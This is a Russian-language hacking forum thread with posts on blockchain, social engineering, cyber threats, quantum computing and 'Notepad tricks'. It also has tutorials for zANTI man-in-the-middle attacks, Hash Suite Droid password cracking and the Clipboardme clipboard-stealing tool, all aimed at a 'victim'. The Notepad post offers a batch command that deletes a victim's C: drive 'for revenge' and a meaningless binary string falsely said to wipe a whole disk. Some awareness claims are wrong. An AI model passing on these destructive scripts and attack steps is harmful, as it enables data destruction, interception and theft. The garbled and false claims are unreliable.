3. Неизменяемость. Неизменяемость реестра в технологии блокчейн гарантирует, что записанные транзакции остаются там навсегда и не могут быть изменены или удалены. Это создает постоянную и безопасную запись всех транзакций в сети.
4. Транзакции. Чтобы совершить транзакцию в блокчейне, пользователь создает цифровую подпись, чтобы идентифицировать себя и авторизовать транзакцию. Затем сеть проверяет транзакцию и транслирует ее, добавляя к следующему блоку в цепочке.
5. Блоки. Цепочка формируется путем соединения блоков, в которых записываются транзакции. Каждый блок содержит уникальный код, называемый хешем, который связывает его с предыдущим блоком. Это создает безопасную и бесконечную запись всех сделок в сети.
6. Алгоритм консенсуса. Алгоритм консенсуса — это процесс, с помощью которого сеть компьютеров достигает соглашения о текущем состоянии реестра. Алгоритм консенсуса гарантирует, что сеть достигает соглашения, не полагаясь на центральный орган. Блокчейн обычно использует Proof of Work (PoW) в качестве алгоритма консенсуса.
7. Криптография. Также Блокчейн использует криптографию для защиты транзакций и обеспечения целостности реестра. Это включает в себя использование цифровых подписей и хеширование для защиты транзакций и связывания блоков в цепочку.
8. Смарт-контракты. Смарт-контракт — это самоисполняющийся контракт, условия которого прямо прописаны в коде. Смарт-контракты автоматизируют процессы и устраняют необходимость в посредниках, ускоряя транзакции и делая их более эффективными.
Заключение
Блокчейн — это революционная технология, которая может трансформировать многие сферы нашей жизни. Понимая основы блокчейна, сложно не отметить его положительное влияние. Децентрализованный и безопасный характер блокчейна делает его идеальным для широкого спектра применений, включая финансы, управление цепочками поставок и даже здравоохранение. Многие государства и компании мирового уровня уже внедряют в свою деятельность и структуру технологию Блокчейн. А вы как вы считаете, сможет ли Блокчейн изменить мир в лучшую сторону?
BlackMAST
24.02.2023, 14:07
«На сегодняшний день нет такой технологии, которую нельзя было бы взломать с помощью социальной инженерии» - Френк Абигнейл.February 22, 2023
https://i.gyazo.com/bc524b2f75c17b9e2fd59a830f13aa2c.jpg
Вступить в наш чат
Если вы спросите специалиста по кибербезопасности: «Какое самое слабое звено в любой системе?» Ответ вас удивит — это люди.
Атака с использованием социальной инженерии — это тип кибератаки, в которой используются психологические манипуляции, чтобы заставить людей разгласить конфиденциальную информацию или выполнить действия, которые помогут злоумышленнику получить доступ к системе или личным данным. Эти атаки могут быть невероятно эффективными, а их последствия могут варьироваться от кражи личной информации до репутационного ущерба крупной компании и финансовых потерь.
В этой статье мы расскажем о различных видах атак социальной инженерии, методах, используемых злоумышленниками, и о том, как их предотвратить.
https://i.gyazo.com/dc564ba1dbcafeb3ece34067a1e565ce.jpg
Виды атак социальной инженерии
Фишинг
Фишинговая атака — это атака с использованием социальной инженерии, включающая отправку электронных писем, сообщений под видом банка, интернет-магазина и других организаций, чтобы обманным путем заставить пользователей раскрыть свою личную информацию, такую как пароли или номера кредитных карт. Обычно фишинг относится к социальной инженерии, потому что в этом мошенничестве ключевую роль играет человеческая ошибка.
В 2018 году произошла крупная фишинговая атака, направленная на криптовалютную биржу Binance. Злоумышленники создали поддельный веб-сайт, который выглядел в точности как «Binance», и рассылали пользователям электронные письма с просьбой войти в свои учетные записи. Когда пользователи ввели свои учетные данные для входа, злоумышленники смогли получить доступ к их аккаунтам и украсть их криптовалюты.
Байтинг
Байтинг – метод, похожий на фишинг, также включающий в себя использование социальной инженерии. Его суть — заставить человека сделать то, что он обычно не делает, например, загрузить файл или открыть ссылку, предлагая определенное вознаграждение, такое как бесплатный подарок или скидку.
В 2011 году байтинг атака была направлена против Торговой палаты США. Нападавшие оставили USB-накопители на парковке штаб-квартиры Палаты. Когда сотрудники нашли их и подключили к своим компьютерам, было установлено вредоносное ПО, которое позволило злоумышленникам получить доступ к компьютерной сети Палаты.
Претекстинг
Обычно такая атака предполагает обращение к жертве по телефону с заранее заготовленным сценарием (претекстом), чтобы убедить человека раскрыть конфиденциальную информацию, например, данные кредитной карты.
В 2018 году атака со сценарием была направлена на город Атланта. Злоумышленники представились сотрудниками компании, предоставляющей ИТ-услуги по городу, и убедили настоящих сотрудников раскрыть свои учетные данные для входа в систему. Злоумышленники смогли установить программу-вымогатель в компьютерной сети города и потребовали выкуп.
Целевой фишинг
Целевой фишинг — тип атаки, когда фишинг-сообщение отправляется не группе случайных пользователей, а конкретному лицу. Мошенники тщательно собирают информацию о пользователе, чтобы максимально персонализировать сообщение и сделать фишинг более эффективным.
В 2016 году целевая фишинговая атака была направлена против Национального комитета Демократической партии США. Злоумышленники разослали электронные письма сотрудникам DNC с просьбой сбросить пароли электронной почты. Когда сотрудники нажали на ссылку в электронном письме, они попали на поддельный веб-сайт, который выглядел как страница входа в электронную почту DNC. Злоумышленники смогли украсть конфиденциальную информацию и слить ее общественности.
Тейлгейтинг
Чтобы взломать хорошо защищенную цель, хакеры могут даже попытаться проникнуть в штаб-квартиру компании. Самая популярная уловка, которую используют преступники, не заключается в подделке учетных данных, все намного проще: злоумышленник просто проходит за кем-то, когда тот открывает дверь. В зарубежных компаниях эту практику называют «тейлгейтинг». Находясь внутри здания, хакеры используют манипуляции и хитрые уловки: при помощи навыков социальной инженерии, они обходят охранников, получают доступ к компьютерам и даже крадут документы.
В 2019 году тейлгейтинг-атака была нацелена на технологическую компанию Кремниевой долины. Злоумышленник выдал себя за курьера и проследовал за сотрудником в здание компании. Оказавшись внутри, злоумышленник смог украсть несколько ноутбуков.
Методы социальной инженерии
Злоумышленники используют ряд методов, чтобы завоевать доверие своей жертвы и заставить ее сделать что-то, что противоречит ее интересам. Некоторые из этих методов включают в себя:
Острая необходимость. Создание ощущения срочности и безотлагательности помогает убедить людей действовать быстро, не задумываясь о последствиях.
Власть. Злоумышленники изображают из себя авторитетных лиц, таких как сотрудники правоохранительных органов или специалисты по ИТ-безопасности, чтобы втереться в доверие своей жертвы.
Эмоция. Игра на эмоциях, таких как страх или сочувствие помогает злоумышленникам манипулировать жертвой и добиться желаемого в кратчайший срок.
Дефицит. Следующий метод заключается в создании ощущения нехватки или ограниченности, чтобы убедить жертву предпринять немедленные действия, например совершить покупку или разгласить личную информацию.
Знакомство. Чтобы завоевать доверие, злоумышленники выдают себя за людей или организации, с которыми жертва знакома или чьими услугами пользуется, например коллега или банк.
Запугивание. Тактика запугивания, например, с помощью угроз судебного иска или физической расправы, подталкивает людей к необдуманным поступкам, таким как разглашение конфиденциальной информации.
Обратная социальная инженерия. При обратной социальной инженерии злоумышленник позиционирует себя как жертву, нуждающуюся в помощи. Как только жертва проявит сочувствие, злоумышленник может получить доступ к личным данным.
Важно быть в курсе новейших методов социальной инженерии и проявлять осторожность при взаимодействии с незнакомыми людьми или организациями, особенно в Интернете.
Меры предосторожности
Чтобы предотвратить атаки социальной инженерии, следует:
Быть осторожным с электронными письмами и сообщениями от неизвестных источников: не переходите по ссылкам и ничего не загружайте из вложений. Прежде чем предпринимать какие-либо действия, проверьте личность отправителя.
Используйте многофакторную аутентификацию. Она помогает обеспечить вас дополнительным уровнем защиты. Злоумышленник не сможет получить доступ к вашим данным, если не будет знать код, отправленный на ваш телефон.
Используйте надежные и уникальные пароли. Сложные пароли труднее угадать, что затрудняет задачу для злоумышленников.
Установите защитное программное обеспечение: установите антивирусное и антивредоносное программное обеспечение на все устройства, чтобы обнаруживать и предотвращать атаки.
Будьте бдительны: всегда будьте на чеку и сообщайте о любых подозрительных действиях в соответствующие органы.
Заключение
Атаки социальной инженерии становятся все более изощренными и опасными. Не стоит недооценивать злоумышленников, которые используют ряд тактик и методов, чтобы завоевать доверие своих жертв и манипулировать ими для получения желаемого. Чтобы предотвратить атаки с использованием социальной инженерии, отдельные пользователи и организации должны проявлять бдительность и принимать меры, необходимые для защиты от этих атак. Выполнив советы по безопасности, описанные в этой статье, вы можете помочь защитить себя от атак социальной инженерии.
На этом все. Удачи!
BlackMAST
27.02.2023, 20:38
https://i.gyazo.com/ac69da750bd6bf48387275ae2418c03b.jpg
Вступить в наш чат
Количество кибератак растет по мере того, как мы становимся все более зависимыми от технологий и Интернета. Новые киберугрозы постоянно развиваются, становятся все более изощренными и непредсказуемыми, что затрудняет защиту наших данных. Чтобы суметь предотвратить риски, важно быть в курсе последних событий в мире хакинга.
В этой статье мы расскажем вам о новых киберугрозах с примерами из жизни и поделимся практическими советами о том, как защитить себя.
https://i.gyazo.com/b2586731072fc2dc46e802e83122c3c9.jpg
Атаки программ-вымогателей
Атаки программ-вымогателей — одни из самых разрушительных типов кибератак. Программа-вымогатель — это разновидность вредоносного ПО, которое шифрует ваши файлы и требует выкупа в обмен на ключ дешифрования. Такие атаки наносят значительный ущерб пользователям и компаниям, часто приводя к потере и краже данных.
Более того, в последние годы злоумышленники стали более изощренными и применяют новые тактики, такие как двойное вымогательство, при котором они сначала крадут данные, а затем шифруют их, чтобы потребовать выкуп.
В 2021 году атака программы-вымогателя была нацелена на Colonial Pipeline, крупный топливный трубопровод в Соединенных Штатах, что привело к повсеместной нехватке топлива и паническим закупкам в нескольких штатах.
Защита от угроз программ-вымогателей
Чтобы защитить себя от атак программ-вымогателей, убедитесь, что у вас есть надлежащие резервные копии ваших данных.
Также регулярно обновляйте свое программное обеспечение и соблюдайте осторожность при открытии электронных писем, сообщений из неизвестных источников.
Регулярное сканирование ваших устройств на наличие уязвимостей может помочь вам обнаружить программу-вымогатель.
Фишинговые атаки
Фишинговые атаки — это тип кибератаки, при которой жертву обманом заставляют сообщать личную информацию, такую как учетные данные для входа, номера кредитных карт и другие конфиденциальные данные.
Злоумышленники используют различные тактики, такие как электронные письма, сообщения или телефонные звонки. Фишинговые атаки широко распространены и представляют значительный риск для доверчивых и невнимательных пользователей. Киберпреступники становятся все более виртуозными в создании убедительных сценариев, поддельных веб-сайтов и страниц для входа.
В 2021 году произошла фишинговая атака на компанию-разработчика программного обеспечения SolarWinds, которая привела к крупному сбою поставок и затронула несколько государственных учреждений и частных компаний США.
Защита от фишинговых угроз
Чтобы защитить себя от фишинговых атак, всегда будьте осторожны при переходе по ссылкам или загрузке файлов из неизвестных источников.
Убедитесь, что у вас установлено ПО для защиты от фишинга.
Регулярно обновляйте программное обеспечение и антивирус.
Относитесь с подозрением к любым нежелательными сообщениям и звонкам из неизвестных источников.
Безопасность Интернета вещей (IoT)
Интернет вещей (IoT) — это сеть физических устройств, транспортных средств и других объектов, оснащенных датчиками, программным обеспечением и средствами связи, что позволяет им подключаться и обмениваться данными. Эти устройства имеют много преимуществ, но они также представляют значительный риск для безопасности. Устройства IoT могут быть уязвимы для атак и могут использоваться для получения доступа к другим частям сети.
В 2021 году в популярной системе умных дверных замков была обнаружена уязвимость, которая позволила злоумышленникам удаленно открывать двери без особого труда. Таким образом, эта уязвимость долго использовалась для получения доступа к чужим домам и предприятиям.
Защита от IoT-угроз
Чтобы защитить себя от угроз безопасности IoT, важно убедиться, что вы меняете пароли по умолчанию на устройствах IoT и поддерживаете их программное обеспечение в актуальном состоянии.
Для дополнительной защиты используйте отдельную сеть для IoT устройств, чтобы изолировать их.
Кроме того, регулярно проверяйте свои устройства на наличие подозрительной активности и отключайте все неиспользуемые функции.
Облачная безопасность
Облачные хранилища становятся все более популярными, но также имеют свои уязвимости в безопасности. Облачная безопасность относится к защите данных и приложений, размещенных на удаленных серверах.
В 2021 году неправильно настроенный облачный сервер привел к утечке данных, в результате которой была раскрыта личная информация миллионов пользователей популярного мобильного приложения.
Как защитить свое облачное хранилище
Чтобы защитить себя от угроз, важно выбирать надежных облачных провайдеров, использовать надежные пароли и включать многофакторную аутентификацию.
Вы также должны регулярно проверять свои облачные хранилища на предмет необычной активности и шифровать данные.
Внутренние угрозы
Внутренние угрозы происходят со стороны сотрудников или подрядчиков, имеющих доступ к конфиденциальной информации. Они могут быть как умышленными, так и непреднамеренными. В первом случае лица могут случайным образом совершить ошибку по невнимательности, которая приведет к подрыву безопасности. Во втором же — это запланированная операция сотрудниками, имеющими конфиденциальный доступ к данным.
В 2013 году Эдвард Сноуден, подрядчик Агентства национальной безопасности (АНБ), передал в прессу секретную информацию о программах наблюдения агентства. Утечка стала одной из крупнейших в истории и нанесла значительный ущерб репутации АНБ.
Защита от внутренних угроз
Для защиты от внутренних угроз организации должны иметь четкие правила и процедуры для управления доступом конфиденциальными данными и системами. Они должны включать регулярное обучение сотрудников и подрядчиков тому, как выявлять подозрительное поведение и сразу же докладывать о нем.
Также важно отслеживать действия пользователей и внедрять средства управления безопасностью, такие как контроль доступа, предотвращение потери данных и аналитика поведения сотрудников.
Киберфизические атаки
Киберфизические атаки — это тип кибератак, направленных на физические системы или инфраструктуру (электрические сети, транспортные системы и промышленные системы управления). Они становятся все более распространенными по мере того, как системы все чаще зависят от технологий. Эти атаки могут повлечь за собой реальный ущерб и сбои в системе.
Одним из примеров киберфизической атаки является червь Stuxnet, который был обнаружен в 2010 году. Червь Stuxnet был разработан для атак на промышленные системы управления, используемые на ядерных объектах в Иране. Он смог нанести физический ущерб центрифугам, используемым при обогащении урана с помощью манипуляций их рабочими параметрами. Атака была сложной и требовала высокого уровня знаний для ее выполнения. Именно поэтому, многие убеждены, что это было осуществлено правительством.
Защита от киберфизических угроз
Для защиты от киберфизических атак организациям необходимо применять многоуровневый подход к безопасности:
Внедрение строгого контроля доступа и механизмов аутентификации для предотвращения неразрешенного доступа к критически важным системам.
Мониторинг систем на предмет подозрительной активности и внедрение средств безопасности, которые могут обнаруживать и предотвращать атаки.
Заключение
Рассмотренные выше примеры иллюстрируют реальное влияние киберугроз. Поскольку технологии продолжают развиваться, организациям и отдельным лицам важно сохранять бдительность и предпринимать шаги для защиты от возможных угроз. Будьте в курсе последних тенденций в области безопасности, а мы поможем минимизировать риск кибератак и защитить ваши конфиденциальные данные. На этом все. Удачи!
BlackMAST
16.03.2023, 17:20
https://i.gyazo.com/3656446b17dd7ec8d0d790b2521501f5.jpg
Трюки с Блокнотом, которые вас удивят
Вступить в наш чат
Программу Блокнот очень сильно недооценивают. Признайтесь, как часто вы пользуетесь ей? Готовы поспорить, что все ваши действия в этой программе заканчиваются на наборе случайного текста с периодичностью раз в год. А знаете ли вы, какие-либо лайфхаки с использованием Блокнота? Сегодня мы приготовили несколько необычных трюков. И все, что вам потребуется, это БЛОКНОТ!
https://i.gyazo.com/1b3dba06504288b53de46cdd7cb1ac46.png
1. Дневник/журнал
Хотите вести цифровой дневник без использования каких-либо сторонних приложений и программ? Как вы уже могли догадаться, вам понадобиться лишь Блокнот.
Шаг 1: Откройте Блокнот из меню «Пуск» или командной строки.
Шаг 2: Введите «.LOG» в первой строке.
Шаг 3: Сохраните файл как name.txt.
Теперь, когда вы открываете файл, он будет отображать дату и время, чтобы вы могли написать все, что захотите.
2. Заставьте клавиатуру мигать, как диско шар
Этот трюк заставит мигать клавиатуру, что наверняка напугает жертву, заставив думать, что ее взломали или что-то в этом роде. Скопируйте и вставьте код в Блокнот и сохраните его как «disco.vbs».
Код:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
3. Проверьте, как хорошо работает ваш антивирус
Многие антивирусные программы могут быть эффективными и молниеносно находить вирусы, а другие нет. У вас есть возможность узнать, к какой категории относится ваш антивирус с помощью этого простого трюка. Скопируйте и вставьте приведенный ниже код в свой блокнот и сохраните его как «virus.exe» (не волнуйтесь, это не является никаким вирусом на самом деле). Затем как обычно выполните проверку на наличие вирусов.
Если этот файл обнаружится, значит, ваш антивирус исправен. В противном случае нужно начинать искать другие варианты. Это один из самых полезных лайфхаков в Блокноте.
Код:
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
4. Защитите файл паролем
Наверняка, на вашем компьютере есть файлы, которые вы хотите сохранить в тайне. И вы, вероятно, используете стороннее приложение для этого. Но что, если мы скажем, что вам оно не нужно? Этот лайфхак поможет защитить файл от любопытных глаз паролем. Да, никакого стороннего софта, только несколько строк кода. Звучит круто, правда?
Скопируйте и вставьте код, написанный ниже, и сохраните файл с расширением «.bat».
Код:
title Folder Private
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock the folder
set/p “pass=>”
if NOT %pass%== techmaniya.com goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
5. Удалите содержимое диска C:
Хотите жестко отомстить в хакерском стиле? Этот трюк для вас. Скопируйте и вставьте приведенный ниже код, и сохраните под любым названием, но с расширением «.bat». Когда этот файл откроется на любом ПК, он сотрет весь диск C:.
Код:
@Echo off
Del C:\ *.* |y
6. Очистите весь жесткий диск
Если Блокнот может стереть весь диск C:, сможет ли он стереть весь жесткий диск? Ответ: Да. Ниже написан код для этой цели. Обязательно присвойте файлу расширение «.exe» после копирования кода в «Блокнот». Как только файл будет открыт, весь жесткий диск сотрется.
Код:
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
BlackMAST
03.04.2023, 17:29
Что такое квантовые вычисления, и как они изменят наш мир
https://i.gyazo.com/356b74f4861fe996ce2266f8634c8d7b.jpg
Вступить в наш чат
Квантовые вычисления — это технология будущего, которая может произвести революцию во многих отраслях, включая кибербезопасность. В этой статье мы расскажем о происхождении квантовых вычислений, об их влиянии на настоящее, и какие их прогнозы относительно будущего.
Итак, давайте начнем.
https://i.gyazo.com/8c516dfbe6bb86d5aeb51a11b4f87875.jpg
Происхождение квантовых вычислений
Концепция квантовых вычислений была впервые представлена в 1980-х годах Ричардом Фейнманом, который предположил, что квантовые компьютеры могут выполнять вычисления, выходящие за рамки возможностей классических компьютеров.
В 1990-х годах Питер Шор разработал алгоритм, который показал, что квантовые компьютеры могут разлагать большие числа на множители за полиномиальное время, что считается непосильной задачей для классических компьютеров.
Первый в мире квантовый компьютер
https://i.gyazo.com/28b4e36cfa5ebb05d7061ccbdc29990d.png
Текущий сценарий
В настоящее время квантовые компьютеры находятся на ранних стадиях разработки, и потому еще не представляют существенную значимость. Однако, уже на данный момент квантовые компьютеры успели оказать некое влияние на криптографию.
Многочисленные криптографические методы, которые в настоящее время считаются самыми безопасными, такие как RSA и ECC, оказалась уязвимы для атак квантовых компьютеров. Именно поэтому в настоящее время разрабатываются новые постквантовые методы, которые будут устойчивы к таким атакам.
Квантовый компьютер
https://i.gyazo.com/97b8b00fc788f239697a523a7ae3c0a8.png
Будущее квантовых вычислений
Будущее квантовых вычислений является многообещающим, так как исследователи добились уже некоторых успехов в разработке практических квантовых компьютеров. Например, Google разработала квантовый компьютер с 53 кубитами, а IBM представили квантовый компьютер с 65 кубитами. Кроме того, Microsoft работает над созданием топологического кубита, который может быть более устойчивым к ошибкам, чем существующие кубиты.
Влияние на криптографию
Как упоминалось ранее, квантовый компьютер может взломать многие криптографические методы, которые в настоящее время считаются безопасными. Таким образом, квантовый компьютер с 4000 кубитов может взломать 256-битное шифрование ECC всего за несколько минут.
Это означает необходимость разрабатывать новые постквантовые криптографические методы, способные противостоять атакам квантовых компьютеров. Одним из примеров такого метода является криптография на основе решетки, которая устойчива к таким атакам.
Примеры потенциального влияния квантовых вычислений на криптографию
Одним из примеров потенциального влияния квантовых вычислений на криптографию является уязвимость цифровых подписей. Цифровые подписи, использующиеся для проверки подлинности электронных документов, основаны на математических алгоритмах, которые оказались уязвимыми для атак квантовых компьютеров.
Следовательно, разработка новых постквантовых схем цифровой подписи будет способна противостоять таким атакам.
Еще одним примером его потенциального влияния на криптографию является уязвимость защищенных коммуникаций. Например, протокол обмена ключами, используемый в Transport Layer Security (TLS), который защищает онлайн-транзакции, может быть взломан квантовым компьютером.
Заключение
В заключение следует отметить, что квантовые вычисления — это новая, малоизученная технология, которая может оказать значимое влияние на все сферы нашей жизни. Хотя квантовые компьютеры еще недоступны, исследователи сумели добиться успеха уже на стадии их разработки.
Тем не менее, влияние на криптографию означает, что требуется разрабатывать новые постквантовые криптографические методы, способные противостоять атакам со стороны квантовых компьютеров. Оставаясь в курсе последних разработок в области квантовых вычислений и криптографии, мы можем обеспечить безопасность нашего цифрового мира перед лицом новых угроз.
BlackMAST
03.04.2023, 17:58
Лучшее хакерское приложение для Android
https://i.gyazo.com/9b3e015046178927268379ad1344138d.jpg
Вступить в наш чат
Хотите иметь инструменты для взлома и тестирования на проникновение прямо в мобильном устройстве? И нет, сегодня мы не будем рассказывать про фейковые приложения для взлома или программы для розыгрыша друзей. Пришло время научиться взламывать как настоящий профи с помощью инструмента zANTI. У нас есть, чем вас удивить! Этот карманный помощник может взламывать пароли, беспроводные сети, изменять http-запросы, а также многое другое. И всё это можно сделать прямо в вашем телефоне.
https://i.gyazo.com/083c346169cdb06ee5a5285a05429d32.jpgzANTI — набор инструментов для мобильного пентестинга, который позволяет вам выполнять вредоносные атаки в сети, такие как: взлом роутеров, аудит паролей, создание и запуск HTTP-сервера на вашем Android-устройстве, сканирование устройства на наличие открытых портов, проверка устройства на уязвимость shellshock и SSL poodle. Короче говоря, это приложение — универсальный инструмент для хакеров во всех его проявлениях.
1) Установка zANTI
Шаг 1: Зайдите на официальный сайт zANTI Toolkit.
Шаг 2: Введите свой адрес электронной почты, после чего появится ссылка для скачивания:
https://i.gyazo.com/faababdc0f31d17f413e26be965c5c74.jpgШаг 3: Загрузите файл apk на свой телефон.
Шаг 4: Поставьте флажок рядом с «Установкой из неизвестных источников».
Шаг 5: Сразу же после этого файл apk можно будет установить.
Шаг 6: Откройте приложение, предоставьте ему все запрашиваемые разрешения и подключитесь к сети Wi-Fi.
С помощью zANTI вы можете делать следующее:
1. Перехват HTTP-сессий с использованием MITM
Эта функция позволит вам перенаправить весь HTTP-трафик на определенный сервер или сайт. Для этого нажмите на значок настроек и поместите URL-адрес в пробел. Вы также можете перенаправить HTTPS на HTTP, чтобы сделать сеть менее безопасной и более удобной для взлома.
2. Перехват загрузок
Эта функция позволит вам подключиться к папке загрузок хоста и получить копию всех файлов. Например, если вы выберете «.pdf» в меню, то все PDF-файлы будут загружены на ваш телефон. Вы можете легко заставить жертву скачать вредоносные программы, а также завладеть их загрузками для получения конфиденциальной информации.
3. Изменить HTTP-запросы и ответы
Используйте функцию zPacketEditor, которая позволяет вам взломать HTTP-запросы в вашей сети. Вы можете редактировать и отправлять каждый запрос и ответ.
4. Проверка уязвимостей роутера
Router pwn — это веб-приложение для проверки уязвимостей роутера. Это набор «готовых к запуску» локальных и удаленных эксплойтов. Чтобы начать ими пользоваться, сначала нажмите «Routerpwn.com», а затем выберите поставщика маршрутизатора.
5. Взлом паролей
Это основная функция zANTI, с помощью которой вы можете перехватывать пароли в сетях. Для этого выберите устройство и нажмите кнопку «MITM». Результаты отобразятся в разделе сохраненных паролей. Такой способ взлома паролей очень распространен в Интернете, и называется он «сниффинг».
6. Проверка устройства на наличие уязвимостей
Сначала выберите устройство и нажмите «Shellshock/SSL Poodle». Приложение начнет сканирование, которое займет некоторое время, после чего вы увидите результат.
7. Сканирование Nmap
Сканирование Nmap даст вам краткую сводку о жертве и сети, в том числе об открытых портах, IP-адресе, операционной системе и т. д. Это может быть очень полезно для деанона жертвы и поиска дальнейших способов взлома.
Заключение
Это были основные функции, которые вы можете выполнить с помощью zANTi. Как вы уже поняли, приложение может похвастаться большим выбором инструментов для пентестинга. Интерфейс zANTI лаконичен и прост в использовании. Таким образом, сегодня вы узнали, как взломать и проверить устройство на уязвимости прямо с телефона. Надеемся, вам понравилась данная тема. Увидимся в следующей статье!
BlackMAST
06.04.2023, 11:56
Лучшее приложение для взлома паролей на Android
https://i.gyazo.com/5be73a682c1abaa98f1265a69849f0cb.jpg
Вступить в наш чат
Хотите взломать пароль, но у вас нет навыков работы с Kali Linux или вовсе нет компьютера — не беспокойтесь, теперь вы можете хакнуть пароли с помощью одного лишь телефона. А поможет нам в этом Hash Suite Droid — инструмент для взлома паролей на Android. Сегодня мы вам расскажем, что он из себя представляет, и как им пользоваться.
https://i.gyazo.com/5c271a34a0adfecca587b71465edc4e0.jpg
Что такое Hash Suite Droid
Hash Suite Droid — это Android-версия известного набора инструментов для взлома паролей. Проще говоря, это инструмент, который взламывает хэши паролей с помощью вашего устройства Android. А главный его плюс заключается в том, что он не требует root-доступа и абсолютно бесплатен.
Итак, сейчас мы на практике покажем вам, как пользоваться этим инструментом.
Установка
Шаг 1: Загрузите и установите apk-пакет инструмента.
Вы можете сделать это на их официальном сайте по ссылке. Если вас интересует код и технические детали, ознакомьтесь с информацией на Github.
Шаг 2: Импорт хэшей паролей.
После установки вам необходимо импортировать хэши на свой телефон, щелкнув параметр ИМПОРТ в меню.
Шаг 3: Выберите методы, правила и параметры.
Приложение Hash Suite Droid поддерживает брутфорс-атаку на следующие типы хеширования:
LM; NTLM; MD5; SHA1; SHA256; SHA512; DCC/2; WPA-PSK; BCRYPT.
Опции:
поддержка брутфорс атаки методом грубой силы, атаки по словарю, комбинированной атаки по правилам;
выбор количества задействования ядер CPU;
настройка диапазона температурного режима батареи в с° в установившемся рабочем режиме.
Давайте немного подробнее рассмотрим методы взлома паролей:
Атака по словарю. Что делает словарь, так это сравнивает пароль в списке слов с паролем, который вы хотите взломать. Это самый эффективный метод взлома паролей в настоящее время. Пока у вас есть всеобъемлющий список слов, вы можете взломать любой пароль. Вы также можете добавить и собственные словари.
Брутфорс атака. Многие люди в качестве пароля используют популярные слова или комбинации букв. Примером может служить «qwerty» или «12345». Существует и множество других готовых шаблонов, которые вы можете применить в своей атаке. Приложение также имеет множество других параметров настройки.
Атака по фразе. Если пароль содержит фразу, то его можно легко взломать этим методом.
Комбинированная атака. В такой атаке вы сами устанавливаете комбинации букв. Это грубая атака, но с правильным подходом вы можете сделать ее более эффективной. Например, вы вправе определить длину символа и тип выбираемых символов, а также многое другое.
https://i.gyazo.com/64966cdd88aec388c9030324fa272967.jpg
Запуск атаки
После того, как вы выбрали метод и параметры атаки на пароль, вы можете приступить к взлому.
В зависимости от производительности устройства, время взлома пароля будет варьироваться. Однако, многие пароли взламываются мгновенно. Убедитесь, что ваше устройство достаточно заряжено. Этот процесс ресурсоемкий, а взлом пароля всегда занимает много времени. Наберитесь терпения, только тогда ваша атака будет успешной. После того, как вы успешно хакнули пароль, вы его сразу же увидите в списке паролей.
Вот так просто вы научились взламывать пароли прямо в телефоне.
Часто задаваемые вопросы (FAQ)
№1. Этот инструмент бесплатный?
Да, этот инструмент для пентеста можно использовать совершенно бесплатно.
№2. Я могу взломать любой пароль?
Да, вы можете взломать любой пароль, если у вас есть хороший словарь, и пароль соответствует хешу в предоставленном словаре.
№3. Приложение безопасно для устройства?
Конечно, это не повредит вашему устройству. Однако, мы все же рекомендуем ограничить использование батареи и процессора, чтобы ваше устройство не сильно нагревалось. Взлом паролей требует большой вычислительной мощности и может привести к быстрому нагреву вашего устройства.
№4 Приложение работает на IOS?
К сожалению, нет. Приложение поддерживается только на андроид.
Заключение
Hash Suite Droid - отличное хакерское приложение, как для новичков, так и для продвинутых пользователей. Вы можете сами устанавливать собственные критерии для взлома, контролировать процесс и наслаждаться результатом за считанные минуты. Приложение просто в использовании, а главное полностью бесплатно и с открытым исходным кодом.
BlackMAST
10.04.2023, 14:05
Как взломать содержимое буфера обмена
https://i.gyazo.com/18a01fc1344d5b7105ab01e7fcd64bde.jpg
Вступить в наш чат «Копировать-вставить, копировать-вставить.» С большим количеством учетных записей и их паролей, люди привыкли сохранять данные в текстовом файле, чтобы в дальнейшем просто их скопировать и вставить в нужное поле. Да, такой подход существенно экономит время, но также делает данные пользователей более уязвимыми для взлома. Сейчас мы расскажем о способе, который позволяет удалено читать и контролировать чужие данные буфера обмена.
https://i.gyazo.com/cdf43f7cc232894a46e9239c0568d727.jpg
Как взломать данные буфера обмена с помощью Clipboardme?Шаг 1: Откройте терминал Kali Linux и введите следующую команду, чтобы клонировать инструмент:
git clone https://github.com/cyberkallan/clipboardme
Шаг 2: Теперь переключитесь в каталог с помощью команды cd и запустите скрипт с помощью bash. Просто введите команды, указанные ниже:
cd clipboardme
bash clipboardme.sh
Шаг 3: Теперь выберите инструмент переадресации портов. Мы предпочитаем Ngrok, но при необходимости вы можете использовать serveo.net.
https://i.gyazo.com/028e7a906cb10698e0105bb448e65422.jpg
Шаг 4: После этого появится ссылка, как показано выше. Как только жертва откроет ее, содержимое буфера обмена будет скопировано.
Совместимость с браузером:Если браузер обновлен до последней версии, то взлом сработает, но жертва увидит следующий запрос на разрешение:
https://i.gyazo.com/ad2bc08e0cb3939b2f5ec5c41f119547.jpg
Шаг 5: Если вы хотите проверить скопированный контент, просто откройте текстовый файл clipboard_backup. Вы также можете использовать те же команды:
cd clipboardme
cat clipboard_backup.txt
Как работает взлом Clipboardme?
Clipboardme — это инструмент пентестера, который может получить доступ для чтения и записи к содержимому в буфере обмена, просто открыв ссылку. Последние версии браузеров не позволяют сделать взлом скрытным, отображая запрос, как было показано выше, однако старые версии могут напрямую копировать содержимое буфера обмена жертвы, используя API.
API изначально предназначался для того, чтобы напрямую интегрировать копирование и вставку между приложениями и сайтами. Проблема в том, что существует очень мало способов защитить скопированный текст. Таким образом, этот хак может легко взломать данные буфера обмена. Для этого введите:
